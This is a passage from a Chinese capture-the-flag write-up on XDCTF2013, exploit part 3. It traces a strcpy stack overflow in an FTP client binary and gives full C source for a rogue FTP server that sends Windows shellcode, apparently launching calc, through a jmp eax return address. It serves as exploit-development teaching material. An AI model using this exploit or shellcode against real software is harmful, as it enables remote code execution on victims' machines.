XDCTF2013线上赛exploit关(三)
来源:互联网 发布:unity3d导入max文件 编辑:程序博客网 时间:2024/06/10 06:28
国际惯例,下载程序后先拖入IDA分析,看了半天也没看出个所以然。
于是直接发送超长数据,看程序会不会崩。
FTP服务器在接收完USER和PASS之后,会发送Welcome信息。直觉告诉我,这儿应该会崩,于是写个socket程序,发送长字符串,程序果然崩了。
然后用windbg载入,用kn命令看一下调用堆栈。尝试了几次后,找到了关键函数sub_4013D0。
这个函数先是创建socket,然后连接远程FTP服务器,之后会调用recv()函数。而且在每次调用recv()之后,都会将接收数据的buf作为参数,调用sub_401032。这个函数就是被覆盖返回地址的函数了。
进入sub_401032后,程序申请了一个0x12C字节的空间
Dest = byte ptr -12Ch
然后将其作为Dest,将前面传入的buf作为Source,调用strcpy()函数。
.text:0040126E mov eax, [ebp+Source]
.text:00401271 push eax ; Source
.text:00401272 lea ecx, [ebp+Dest]
.text:00401278 push ecx ; Dest
.text:00401279 call _strcpy
由于strcpy()不检查缓冲区边界,造成溢出。
找到溢出点之后,接下来就要构造缓冲区,进行利用了。
strcpy函数返回后,eax作为返回值存放的是Dest的地址,因此可以用它还做跳板。
---------------------
shellcode 共计0x12C字节
junk
---------------------
ebp
RetAddr <-- 填充为7c8f6571,即jmp eax
由于每次调用recv()接收数据之后,都会调用sub_401032,因此可以在接受连接发送banner的时候,直接发送shellcode过去。
#include <stdio.h>#include <stdlib.h>#include <WinSock.h>#include <string.h>#pragma comment(lib, "ws2_32.lib")#define PORT 21#define BACKLOG 10#define LEN 308char buf[] = "\xFC\x68\xC9\xBC\xA6\x6B\x68\x63\x89\xD1\x4F\x8B""\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x33\xD2""\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B\x49\x1C\x8B\x09""\x8B\x51\x18\x8B\x52\x34\x80\xFA\x33\x74\x02\x8B""\x09\x8B\x69\x08\xAD\x60\x8B\x45\x3C\x8B\x4C\x05""\x78\x03\xCD\x8B\x59\x20\x03\xDD\x33\xFF\x47\x8B""\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A\xC4\x74\x08""\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C""\x75\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B""\x59\x1C\x03\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61""\x3D\xC9\xBC\xA6\x6B\x75\xB5\x33\xDB\x33\xC0\x53""\x40\x3C\x20\x75\xFA\x33\xDB\x53\xBB\x63\x61\x6C""\x63\x53\x8B\xCC\x33\xC0\x54\x54\x50\x50\x50\x54""\x50\x50\x51\x50\xFF\x57\xFC\x33\xDB\x53\xFF\x57""\xF8";int InitSocket(){WORDwVersionRequested;WSADATAwsaData;interr;wVersionRequested = MAKEWORD(2, 2);err = WSAStartup(wVersionRequested, &wsaData);if (err != 0){printf("WSAStartup failed with error: %d\n", err);return 1;}if (LOBYTE(wsaData.wVersion) != 2 || HIBYTE(wsaData.wVersion) != 2){printf("Could not find a usable version of Winsock.dll\n");WSACleanup();return 1;}return 0;}int main(){SOCKETsockServer;SOCKETsockClient;SOCKADDR_INServerAddr;SOCKADDR_IN ClientAddr;int sin_size;char shellcode[LEN];memset(shellcode, 0x90, LEN);strcpy(shellcode, buf);shellcode[strlen(buf)] = '\x90';*((int *)(shellcode+LEN-4)) = 0x7c8f6571;// jmp eaxServerAddr.sin_family = AF_INET;ServerAddr.sin_port = htons(PORT);ServerAddr.sin_addr.S_un.S_addr = INADDR_ANY;memset(&(ServerAddr.sin_zero), 0, sizeof(ServerAddr.sin_zero));InitSocket();if ((sockServer = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET){printf("[-] Create socket failed.\n");exit(1);}printf("[+] Create socket succeed.\n");if (bind(sockServer, (sockaddr *)&ServerAddr, sizeof(ServerAddr)) == -1){printf("[-] Bind port failed.\n");exit(1);}if (listen(sockServer, BACKLOG) == -1){printf("[-] listen failed.\n");exit(1);}printf("[+] Listening port %d...\n", PORT);sin_size = sizeof(SOCKADDR_IN);sockClient = accept(sockServer, (sockaddr *)&ClientAddr, &sin_size);if (sockClient == INVALID_SOCKET){printf("[-] accept failed.\n");exit(1);}printf("[+] Receive connect from %s.\n", inet_ntoa(ClientAddr.sin_addr));printf("[+] Sending shellcode...\n");if (send(sockClient, shellcode, LEN, 0) == -1){printf("[-] Send shellcode failed.\n");exit(0);}printf("[+] Done.\n");closesocket(sockClient);closesocket(sockServer);WSACleanup();return 0;}利用程序很简单,监听21端口,收到连接就发送shellcode过去。
- XDCTF2013线上赛exploit关(三)
- XDCTF2013线上赛exploit关(二)
- XDCTF2013线上赛exploit关(六)
- XDCTF2013线上赛exploit关(一)
- 安全比赛中exploit关方法小结
- "三关" + "一关"
- exploit
- exploit
- Exploit
- Exploit
- 程序员创业三关
- 程序员创业三关
- 程序员创业三关
- 程序员创业三关
- 程序员创业三关
- 程序员创业三关
- 程序员创业三关
- 井字过三关(算法分析)
- C++成员函数 this指针 调用约定
- Clouda激起WebApp波澜,大戏刚刚上演
- ggplot系列2-更多画图细节——坐标轴和图例
- (原创)数位DP专题小结--by sgx
- 系统版本和API Level对照表
- XDCTF2013线上赛exploit关(三)
- 让大脑裸奔起来
- java设计模式之命令模式
- 中国象棋程序的设计与实现(五)--回答CSDN读者的一些问题
- 记录_处理由编码规范导致的Bug
- android – 多屏幕适配相关
- Android 遍历删除SD卡中某一文件夹下的指定子文件夹及其子文件
- android安卓程序自定义控件
- Java中常用的几种设计模式